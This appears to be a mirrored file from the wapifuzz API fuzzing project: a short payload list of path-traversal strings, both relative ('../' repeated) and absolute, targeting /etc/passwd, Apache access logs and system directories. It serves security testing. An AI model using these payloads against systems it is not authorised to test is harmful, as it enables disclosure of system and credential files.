mirror of
https://github.com/ysoftdevs/wapifuzz.git
synced 2026-03-24 18:31:19 +01:00
17 lines
488 B
Plaintext
17 lines
488 B
Plaintext
# RELATIVE PATHS
|
|
../../../../../../../../../../../../../../../../../apache/logs/access.log
|
|
../../../../../../../../../../../../../../../../../etc/passwd
|
|
../../../../../../../../../../../../../../../../../apache/logs/
|
|
../../../../../../../../../../../../../../../../../etc/
|
|
../../../../../../../../../../../../../../../../../opt/
|
|
../../../../../../../../../../../../../../../../../var/
|
|
|
|
|
|
# ABSOLUTE PATHS
|
|
/apache/logs/access.log
|
|
/etc/passwd
|
|
/apache/logs/
|
|
/etc/
|
|
/opt/
|
|
/var/
|